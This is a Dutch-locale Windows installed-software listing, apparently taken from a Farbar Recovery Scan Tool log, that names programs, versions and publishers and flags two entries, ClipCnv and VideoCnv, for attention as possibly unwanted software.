7-Zip 9.20 (x64 edition) (HKLM\...\{23170F69-40C1-2702-0920-000001000000}) (Version: 9.20.00.0 - Igor Pavlov)
Aangifte inkomstenbelasting 2012 (HKLM-x32\...\Aangifte inkomstenbelasting 2012) (Version:  - Belastingdienst)
Acrobat.com (HKLM-x32\...\{287ECFA4-719A-2143-A09B-D6A12DE54E40}) (Version: 1.6.65 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 2.6.0.19120 - Adobe Systems Incorporated)
Adobe Flash Player 11 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 11.7.700.224 - Adobe Systems Incorporated)
Adobe Flash Player 17 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 17.0.0.134 - Adobe Systems Incorporated)
Adobe Reader X (10.1.10) - Nederlands (HKLM-x32\...\{AC76BA86-7AD7-1043-7B44-AA1000000001}) (Version: 10.1.10 - Adobe Systems Incorporated)
Adobe Shockwave Player (HKLM-x32\...\{D8DFA46A-39F7-4368-810D-18AFCFDDAEAF}) (Version: 11.5.1.601 - Adobe Systems, Inc.)
AIO_CDB_ProductContext (x32 Version: 130.0.365.000 - Hewlett-Packard) Hidden
AIO_CDB_Software (x32 Version: 130.0.365.000 - Hewlett-Packard) Hidden
AIO_Scan (x32 Version: 130.0.421.000 - Hewlett-Packard) Hidden
Apple Application Support (HKLM-x32\...\{83CAF0DE-8D3B-4C37-A631-2B8F16EC3031}) (Version: 3.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{BDD99690-3541-4619-9D2A-3CDDB3E15F9E}) (Version: 8.0.5.6 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Assistent content manager voor PlayStation® (HKLM-x32\...\{BE841724-78F0-44D6-B6C4-C3D53708293B}) (Version: 1.10.4086.63 - Sony Computer Entertainment Inc.)
AVI DVD Burner v5.7.0.195 (HKLM-x32\...\AVI DVD Burner_is1) (Version:  - AviDvdBurner.com Inc.)
AviSynth 2.5 (HKLM-x32\...\AviSynth) (Version:  - )
Battle.net (HKLM-x32\...\Battle.net) (Version:  - Blizzard Entertainment)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Broadcom 802.11 Wireless LAN Adapter (HKLM\...\Broadcom 802.11 Wireless LAN Adapter) (Version: 5.60.350.6 - Broadcom Corporation)
BufferChm (x32 Version: 130.0.331.000 - Hewlett-Packard) Hidden
Bullzip PDF Printer 7.2.0.1304 (HKLM\...\Bullzip PDF Printer_is1) (Version: 7.2.0.1304 - Bullzip)
CCleaner (HKLM\...\CCleaner) (Version: 5.03 - Piriform)
ClipCnv (HKLM-x32\...\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{5e9aae86}) (Version:  - Software Publisher) <==== AANDACHT
Command & Conquer The First Decade (HKLM-x32\...\{66D6F3BD-CA23-41A4-9FA3-96B26B32528C}) (Version: 1.00.0000 - Electronic Arts)
Company of Heroes (New Steam Version) (HKLM-x32\...\Steam App 228200) (Version:  - Relic)
Company of Heroes: Tales of Valor (HKLM-x32\...\Steam App 20540) (Version:  - Relic Entertainment)
Copy (x32 Version: 130.0.428.000 - Hewlett-Packard) Hidden
CPUID CPU-Z 1.56 (HKLM\...\CPUID CPU-Z_is1) (Version:  - )
Crystal Reports for Visual Studio (x32 Version: 12.51.0.240 - SAP) Hidden
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
DAEMON Tools Lite (HKLM-x32\...\DAEMON Tools Lite) (Version: 4.41.3.0173 - DT Soft Ltd)
Deloitte IndustryPrint Process Modeler 4.2 (HKLM-x32\...\{D26B8EC7-A824-49C3-A1B3-E1E4A4D81DD0}) (Version: 4.2.41 - Deloitte)
Destinations (x32 Version: 140.0.77.000 - Hewlett-Packard) Hidden
DeviceDiscovery (x32 Version: 130.0.465.000 - Hewlett-Packard) Hidden
DocProc (x32 Version: 13.0.0.0 - Hewlett-Packard) Hidden
Dotfuscator Software Services - Community Edition (HKLM-x32\...\{1AA5BD63-6614-44B2-88A7-605191EDB835}) (Version: 5.0.2500.0 - PreEmptive Solutions)
Dropbox (HKLM-x32\...\Dropbox) (Version: 3.12.6 - Dropbox, Inc.)
Dropbox Update Helper (x32 Version: 1.3.27.77 - Dropbox, Inc.) Hidden
ENE CIR Receiver Driver (HKLM\...\FFE7D41DF3C645075BB149E21988B63996C34187) (Version: 2.7.4.0 - ENE)
ESU for Microsoft Windows 7 (HKLM-x32\...\{3877C901-7B90-4727-A639-B6ED2DD59D43}) (Version: 1.0.0 - Hewlett-Packard)
Facebook Video Calling 3.1.0.521 (HKLM-x32\...\{2091F234-EB58-4B80-8C96-8EB78C808CF7}) (Version: 3.1.521 - Skype Limited)
Fax (x32 Version: 130.0.418.000 - Hewlett-Packard) Hidden
ffdshow [rev 2583] [2009-01-05] (HKLM-x32\...\ffdshow_is1) (Version: 1.0 - )
FileHippo.com Update Checker (HKLM-x32\...\FileHippo.com) (Version:  - )
GDR 5520 for SQL Server 2008 (KB2977321) (64-bit) (HKLM\...\KB2977321) (Version: 10.3.5520.0 - Microsoft Corporation)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 48.0.2564.97 - Google Inc.)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.29.1 - Google Inc.) Hidden
GPBaseService2 (x32 Version: 130.0.371.000 - Hewlett-Packard) Hidden
GPL Ghostscript Lite 8.70 (HKLM-x32\...\GPL Ghostscript Lite_is1) (Version:  - )
GrabIt 1.7.2 Beta 4 (build 997) (HKLM-x32\...\GrabIt_is1) (Version:  - Ilan Shemes)
GTA2 (HKLM-x32\...\{2987EE84-C4EE-4FF5-8160-32DE00D6ABC6}) (Version: 1.00.001 - )
Haali Media Splitter (HKLM-x32\...\HaaliMkx) (Version:  - )
HiJackThis (HKLM-x32\...\{45A66726-69BC-466B-A7A4-12FCBA4883D7}) (Version: 1.0.0 - Trend Micro)
HP 3D DriveGuard (HKLM\...\{601871C3-CAFA-4244-B67D-36EC9AFA67EC}) (Version: 4.0.3.1 - Hewlett-Packard)
HP Advisor (HKLM-x32\...\{40FB8D7C-6FF8-4AF2-BC8B-0B1DB32AF04B}) (Version: 3.3.9512.3162 - Hewlett-Packard)
HP Imaging Device Functions 13.0 (HKLM\...\HP Imaging Device Functions) (Version: 13.0 - HP)
HP Integrated Module with Bluetooth wireless technology (HKLM\...\{9E9D49A4-1DF4-4138-B7DB-5D87A893088E}) (Version: 6.2.1.500 - Broadcom Corporation)
HP MediaSmart Webcam (HKLM-x32\...\InstallShield_{01FB4998-33C4-4431-85ED-079E3EEFE75D}) (Version: 3.1.2207 - Hewlett-Packard)
HP Photosmart Essential 3.5 (HKLM\...\HP Photosmart Essential) (Version: 3.5 - HP)
HP Photosmart Officejet and Deskjet All-In-One Driver Software 13.0 Rel. B (HKLM\...\{B61ED343-0B14-4241-999C-490CB1A20DA4}) (Version: 13.0 - HP)
HP Product Detection (HKLM-x32\...\{CAE7D1D9-3794-4169-B4DD-964ADBC534EE}) (Version: 10.7.8.0 - Hewlett-Packard Company)
HP Quick Launch Buttons (HKLM-x32\...\{34D2AB40-150D-475D-AE32-BD23FB5EE355}) (Version: 6.50.7.1 - Hewlett-Packard)
HP Setup (HKLM-x32\...\{17B4760F-334B-475D-829F-1A3E94A6A4E6}) (Version: 1.2.3560.3170 - Hewlett-Packard)
HP Solution Center 13.0 (HKLM\...\HP Solution Center & Imaging Support Tools) (Version: 13.0 - HP)
HP Wireless Assistant (HKLM-x32\...\{54CC7901-804D-4155-B353-21F0CC9112AB}) (Version: 3.50.9.1 - Hewlett-Packard)
HPPhotoGadget (x32 Version: 130.0.282.000 - Hewlett-Packard) Hidden
HPPhotoSmartDiscLabelContent1 (x32 Version: 2.04.0000 - Hewlett-Packard) Hidden
HPPhotosmartEssential (x32 Version: 2.04.0000 - Hewlett-Packard) Hidden
HPProductAssistant (x32 Version: 130.0.371.000 - Hewlett-Packard) Hidden
HTC BMP USB Driver (HKLM-x32\...\{31A559C1-9E4D-423B-9DD3-34A6C5398752}) (Version: 1.0.5375 - HTC)
Huur- en zorgtoeslag 2011 (HKLM-x32\...\Huur- en zorgtoeslag 2011) (Version:  - Belastingdienst)
IDT Audio (HKLM-x32\...\{E3A5A8AB-58F6-45FF-AFCB-C9AE18C05001}) (Version: 1.0.6276.0 - IDT)
Intel® Turbo Boost Technology Driver (HKLM-x32\...\{D6C630BF-8DBB-4042-8562-DC9A52CB6E7E}) (Version: 01.00.00.1030 - Intel Corporation)
Intel® Matrix Storage Manager (HKLM\...\{9068B2BE-D93A-4C0A-861C-5E35E2C0E09E}) (Version:  - Intel Corporation)
InterBase 7.0 (HKLM-x32\...\InterBase) (Version:  - )
IPTInstaller (HKLM-x32\...\{08208143-777D-4A06-BB54-71BF0AD1BB70}) (Version: 4.0.8 - HTC)
iTunes (HKLM\...\{2ABBBD91-91E5-4AD7-929A-FE15D1DC0576}) (Version: 12.0.1.26 - Apple Inc.)
Java 7 Update 60 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F03217060FF}) (Version: 7.0.600 - Oracle)
Java™ SE Development Kit 6 Update 15 (64-bit) (HKLM\...\{64A3A4F4-B792-11D6-A78A-00B0D0160150}) (Version: 1.6.0.150 - Sun Microsystems, Inc.)
JavaFX 2.1.0 (HKLM-x32\...\{1111706F-666A-4037-7777-210328764D10}) (Version: 2.1.0 - Oracle Corporation)
JMicron Flash Media Controller Driver (HKLM-x32\...\{26604C7E-A313-4D12-867F-7C6E7820BE4C}) (Version: 1.0.32.1 - JMicron Technology Corp.)
K-Lite Codec Pack 10.6.5 Basic (HKLM-x32\...\KLiteCodecPack_is1) (Version: 10.6.5 - )
LightScribe System Software (HKLM-x32\...\{CC8E94A2-55C7-4460-953C-2A790180578C}) (Version: 1.18.8.1 - LightScribe)
Microsoft .NET Framework 4 Multi-Targeting Pack (HKLM-x32\...\{CFEF48A8-BFB8-3EAC-8BA5-DE4F8AA267CE}) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft .NET Framework 4.5.2 (Nederlands) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1043) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft ASP.NET MVC 2 - Visual Studio 2010 Tools (HKLM-x32\...\{40416836-56CC-4C0E-A6AF-5C34BADCE483}) (Version: 2.0.50217.0 - Microsoft Corporation)
Microsoft ASP.NET MVC 2 (HKLM-x32\...\{DD8FF2F3-0D97-4CF3-AF78-FA0E1B242244}) (Version: 2.0.60926.0 - Microsoft Corporation)
Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{F2508213-9989-4E85-A078-72BE483917EF}) (Version: 3.5.88.0 - Microsoft Corporation)
Microsoft Games for Windows Marketplace (HKLM-x32\...\{4CB0307C-565E-4441-86BE-0DF2E4FB828C}) (Version: 3.5.50.0 - Microsoft Corporation)
Microsoft Halo (HKLM-x32\...\Halo) (Version:  - Microsoft)
Microsoft Help Viewer 1.1 (HKLM\...\Microsoft Help Viewer 1.1) (Version: 1.1.40219 - Microsoft Corporation)
Microsoft Lync Web App Plug-in (HKLM\...\{D8228565-6CD7-40EF-B2EA-C7C95183EDEB}) (Version: 15.8.8308.577 - Microsoft Corporation)
Microsoft Office Outlook Connector (HKLM-x32\...\{95140000-0081-0413-0000-0000000FF1CE}) (Version: 14.0.6123.5001 - Microsoft Corporation)
Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUSR) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Outlook Social Connector Provider for Windows Live Messenger 32-bit (HKLM-x32\...\{95140000-007D-0409-0000-0000000FF1CE}) (Version: 14.0.5120.5000 - Microsoft Corporation)
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.7.205.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft Silverlight 3 SDK (HKLM-x32\...\{2012098D-EEE9-4769-8DD3-B038050854D4}) (Version: 3.0.40818.0 - Microsoft Corporation)
Microsoft Silverlight 4 SDK (HKLM-x32\...\{05855322-BE43-41FE-B583-D3AE0C326D58}) (Version: 4.0.50826.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft SQL Server 2008 (64-bit) (HKLM\...\Microsoft SQL Server 10 Release) (Version:  - Microsoft Corporation)
Microsoft SQL Server 2008 Browser (HKLM-x32\...\{C688457E-03FD-4941-923B-A27F4D42A7DD}) (Version: 10.3.5500.0 - Microsoft Corporation)
Microsoft SQL Server 2008 Native Client (HKLM\...\{2738C4AA-420E-4E13-ADEF-B5AB250E3EF1}) (Version: 10.3.5500.0 - Microsoft Corporation)
Microsoft SQL Server 2008 R2 Data-Tier Application Framework (HKLM-x32\...\{BC537AE0-88AF-47ED-B762-33B0D62B5188}) (Version: 10.50.1750.9 - Microsoft Corporation)
Microsoft SQL Server 2008 R2 Data-Tier Application Project (HKLM-x32\...\{7A56D81D-6406-40E7-9184-8AC1769C4D69}) (Version: 10.50.1750.9 - Microsoft Corporation)
Microsoft SQL Server 2008 R2 Management Objects (HKLM-x32\...\{77F1F8AD-51B8-4490-AEEC-BF480073E0FC}) (Version: 10.50.1750.9 - Microsoft Corporation)
Microsoft SQL Server 2008 R2 Management Objects (x64) (HKLM\...\{EAEBF166-B06A-4D7F-BAF7-6615303D5C7C}) (Version: 10.50.1750.9 - Microsoft Corporation)
Microsoft SQL Server 2008 R2 Transact-SQL Language Service (HKLM-x32\...\{09C52940-A4D1-4409-A7CC-1AAE630CF578}) (Version: 10.50.1750.9 - Microsoft Corporation)
Microsoft SQL Server 2008 Setup Support Files  (HKLM\...\{393CA5BF-0362-42FD-ABC2-BA9D22EF925E}) (Version: 10.3.5520.0 - Microsoft Corporation)
Microsoft SQL Server 2008 Upgrade Advisor (HKLM\...\{0D3BCE9D-1759-41D0-8083-7B1380E7A87E}) (Version: 10.0.1600.22 - Microsoft Corporation)
Microsoft SQL Server Compact 3.5 SP2 ENU (HKLM-x32\...\{3A9FC03D-C685-4831-94CF-4EDFD3749497}) (Version: 3.5.8080.0 - Microsoft Corporation)
Microsoft SQL Server Compact 3.5 SP2 x64 ENU (HKLM\...\{D4AD39AD-091E-4D33-BB2B-59F6FCB8ADC3}) (Version: 3.5.8080.0 - Microsoft Corporation)
Microsoft SQL Server Database Publishing Wizard 1.4 (HKLM-x32\...\{ACE28263-76A4-4BF5-B6F4-8BD719595969}) (Version: 10.1.2512.8 - Microsoft Corporation)
Microsoft SQL Server System CLR Types (HKLM-x32\...\{877B76B2-F83F-4F5A-B28D-3F398641ADB6}) (Version: 10.50.1750.9 - Microsoft Corporation)
Microsoft SQL Server System CLR Types (x64) (HKLM\...\{1E6ED082-E32D-4B2B-8B6A-70B094815135}) (Version: 10.50.1750.9 - Microsoft Corporation)
Microsoft SQL Server VSS Writer (HKLM\...\{0826F9E4-787E-481D-83E0-BC6A57B056D5}) (Version: 10.3.5500.0 - Microsoft Corporation)
Microsoft Sync Framework Runtime v1.0 SP1 (x64) (HKLM\...\{8438EC02-B8A9-462D-AC72-1B521349C001}) (Version: 1.0.3010.0 - Microsoft Corporation)
Microsoft Sync Framework SDK v1.0 SP1 (HKLM-x32\...\{0E3DFC64-CC49-4BE2-8C9C-58EF129675DB}) (Version: 1.0.3010.0 - Microsoft Corporation)
Microsoft Sync Framework Services v1.0 SP1 (x64) (HKLM\...\{034106B5-54B7-467F-B477-5B7DBB492624}) (Version: 1.0.3010.0 - Microsoft Corporation)
Microsoft Sync Services for ADO.NET v2.0 SP1 (x64) (HKLM\...\{1D1CEEF8-3741-45BD-8E77-963E1DEBDDD3}) (Version: 2.0.3010.0 - Microsoft Corporation)
Microsoft Team Foundation Server 2010 Object Model - ENU (HKLM\...\Microsoft Team Foundation Server 2010 Object Model - ENU) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM-x32\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x64 9.0.30729.5570 (HKLM\...\{8338783A-0968-3B85-AFC7-BAAE0A63DC50}) (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570 (HKLM-x32\...\{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}) (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4974 (HKLM-x32\...\{B7E38540-E355-3503-AFD7-635B2F2F76E1}) (Version: 9.0.30729.4974 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Designtime - 10.0.30319 (HKLM\...\{F5079164-1DB9-3BDA-853B-F78AF67CE071}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Runtime - 10.0.40219 (HKLM\...\{1C7C8AAF-A16D-32E8-89E5-F6D165DE0BCE}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Runtime - 10.0.40219 (HKLM-x32\...\{5D9ED403-94DE-3BA0-B1D6-71F4BDA412E6}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual F# 2.0 Runtime (HKLM-x32\...\{85467CBC-7A39-33C9-8940-D72D9269B84F}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual J# 2.0 Redistributable Package (HKLM-x32\...\Microsoft Visual J# 2.0 Redistributable Package) (Version:  - Microsoft Corporation)
Microsoft Visual Studio 2010 ADO.NET Entity Framework Tools (HKLM-x32\...\{14DD7530-CCD2-3798-B37D-3839ED6A441C}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual Studio 2010 Professional - ENU (HKLM-x32\...\Microsoft Visual Studio 2010 Professional - ENU) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual Studio 2010 Service Pack 1 (HKLM-x32\...\Microsoft Visual Studio 2010 Service Pack 1) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft Visual Studio Macro Tools (HKLM-x32\...\Microsoft Visual Studio Macro Tools) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Works (HKLM-x32\...\{5158F1F5-FA1B-4D49-B546-55A5004B89BD}) (Version: 9.7.0621 - Microsoft Corporation)
Movie Maker (x32 Version: 16.4.3505.0912 - Microsoft Corporation) Hidden
Mozilla Firefox 34.0.5 (x86 nl) (HKLM-x32\...\Mozilla Firefox 34.0.5 (x86 nl)) (Version: 34.0.5 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 29.0.1 - Mozilla)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MSXML 4.0 SP2 Parser and SDK (HKLM-x32\...\{716E0306-8318-4364-8B8F-0CC4E9376BAC}) (Version: 4.20.9818.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (KB2721691) (HKLM-x32\...\{355B5AC0-CEEE-42C5-AD4D-7F3CFD806C36}) (Version: 4.30.2114.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (KB2758694) (HKLM-x32\...\{1D95BA90-F4F8-47EC-A882-441C99D30C1E}) (Version: 4.30.2117.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (KB973685) (HKLM-x32\...\{859DFA95-E4A6-48CD-B88E-A3E483E89B44}) (Version: 4.30.2107.0 - Microsoft Corporation)
Network64 (Version: 130.0.572.000 - Hewlett-Packard) Hidden
NirSoft BlueScreenView (HKLM-x32\...\NirSoft BlueScreenView) (Version:  - )
NVIDIA Grafisch stuurprogramma 341.44 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 341.44 - NVIDIA Corporation)
NVIDIA HD Audio-stuurprogramma 1.3.30.1 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.30.1 - NVIDIA Corporation)
OCR Software by I.R.I.S. 13.0 (HKLM\...\HPOCR) (Version: 13.0 - HP)
Octoshape add-in for Adobe Flash Player (HKU\S-1-5-21-1460008453-1702061876-2463211388-1000\...\Octoshape add-in for Adobe Flash Player) (Version:  - )
Origin (HKLM-x32\...\Origin) (Version: 9.1.11.2678 - Electronic Arts, Inc.)
PeerBlock 1.1 (r518) (HKLM\...\{015C5B35-B678-451C-9AEE-821E8D69621C}_is1) (Version: 1.1.0.518 - PeerBlock, LLC)
PM Toolbox (HKLM-x32\...\PM Toolbox) (Version:  - )
Project64 1.6 (HKLM-x32\...\{9559F7CA-5E34-4237-A2D9-D856464AD727}) (Version: 1.6 - Project64)
QLBCASL (x32 Version: 6.40.17.2 - Hewlett-Packard) Hidden
QuickTime 7 (HKLM-x32\...\{3D2CBC2C-65D4-4463-87AB-BB2C859C1F3E}) (Version: 7.76.80.95 - Apple Inc.)
Realtek Ethernet Controller Driver For Windows Vista and Later (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 1.00.0010 - Realtek)
Recovery Manager (x32 Version: 5.5.2214 - CyberLink Corp.) Hidden
Recuva (HKLM\...\Recuva) (Version: 1.51 - Piriform)
Relationele Databases en SQL (HKLM-x32\...\Relationele Databases en SQL_is1) (Version:  - Mattic Software)
Scan (x32 Version: 140.0.80.000 - Hewlett-Packard) Hidden
Secure Download Manager (HKLM-x32\...\{D8A1AE00-9245-400A-B125-138735C0C5A8}) (Version: 3.1.60 - Kivuto Solutions Inc.)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{91140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUSR_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version:  - Microsoft)
Service Pack 3 for SQL Server 2008 (KB2546951) (64-bit) (HKLM\...\KB2546951) (Version: 10.3.5500.0 - Microsoft Corporation)
Skype™ 7.2 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.2.103 - Skype Technologies S.A.)
SolutionCenter (x32 Version: 130.0.373.000 - Hewlett-Packard) Hidden
Sothink Movie DVD Maker (HKLM-x32\...\{4F94119D-1B71-400e-9F04-B4E5CEAE71F8}_is1) (Version: 3.7 - SourceTec Software Co., LTD)
Speccy (HKLM\...\Speccy) (Version: 1.07 - Piriform)
SpyHunter 4 (HKLM-x32\...\SpyHunter) (Version: 4.21.18.4608 - Enigma Software Group, LLC)
SpywareBlaster 5.0 (HKLM-x32\...\SpywareBlaster_is1) (Version: 5.0.0 - BrightFort LLC)
Sql Server Customer Experience Improvement Program (Version: 10.3.5500.0 - Microsoft Corporation) Hidden
Status (x32 Version: 130.0.469.000 - Hewlett-Packard) Hidden
Steam (HKLM-x32\...\{048298C9-A4D3-490B-9FF9-AB023A9238F3}) (Version: 1.0.0.0 - Valve Corporation)
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 15.3.29.0 - Synaptics Incorporated)
System Requirements Lab CYRI (HKLM-x32\...\{E5F05232-96B6-4552-A480-785A60A94B21}) (Version: 5.0.6.0 - Husdawg, LLC)
Taalpakket voor Microsoft Visual Studio 2010 Tools for Office Runtime (x64) - NLD (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - NLD) (Version: 10.0.50903 - Microsoft Corporation)
TeamSpeak 2 RC2 (HKLM-x32\...\Teamspeak 2 RC2_is1) (Version: 2.0.32.60 - Dominating Bytes Design)
TeamViewer 9 (HKLM-x32\...\TeamViewer 9) (Version: 9.0.32494 - TeamViewer)
TechPowerUp GPU-Z (HKLM-x32\...\TechPowerUp GPU-Z) (Version:  - )
The Simpsons Hit and Run (HKLM-x32\...\The Simpsons Hit and Run_is1) (Version:  - )
TIBCO Universal Uninstaller v2.9 (HKLM-x32\...\tibco_universal_installer_290) (Version:  - )
Toolbox (x32 Version: 130.0.648.000 - Hewlett-Packard) Hidden
TrayApp (x32 Version: 130.0.422.000 - Hewlett-Packard) Hidden
TreeSize Free V2.4 (HKLM-x32\...\TreeSize Free_is1) (Version: 2.4 - JAM Software)
Unity Web Player (HKU\S-1-5-21-1460008453-1702061876-2463211388-1000\...\UnityWebPlayer) (Version:  - Unity Technologies ApS)
UnloadSupport (x32 Version: 11.0.0 - Hewlett-Packard) Hidden
VideoCnv (HKLM-x32\...\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{fa6789c5}) (Version:  - Software Publisher) <==== AANDACHT
Visual Studio 2010 Prerequisites - English (HKLM\...\{662014D2-0450-37ED-ABAE-157C88127BEB}) (Version: 10.0.40219 - Microsoft Corporation)
Visual Studio 2010 Tools for SQL Server Compact 3.5 SP2 ENU (HKLM-x32\...\{112C23F2-C036-4D40-BED4-0CB47BF5555C}) (Version: 4.0.8080.0 - Microsoft Corporation)
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.1.5 - VideoLAN)
WCF RIA Services V1.0 SP1 (HKLM-x32\...\{D9E6001A-5DC3-4620-AF7A-80B6CD48645D}) (Version: 4.1.60114.0 - Microsoft Corporation)
Web Deployment Tool (HKLM\...\{0F37D969-1260-419E-B308-EF7D29ABDE20}) (Version: 1.1.0618 - Microsoft Corporation)
WebReg (x32 Version: 130.0.132.017 - Hewlett-Packard) Hidden
WhoCrashed 3.02 (HKLM\...\WhoCrashed_is1) (Version:  - Resplendence Software Projects Sp.)
Windows Driver Package - Broadcom Bluetooth  (06/15/2009 6.2.0.9000) (HKLM\...\6B8550A319DDC8B17F35F4A89988705E4592349B) (Version: 06/15/2009 6.2.0.9000 - Broadcom)
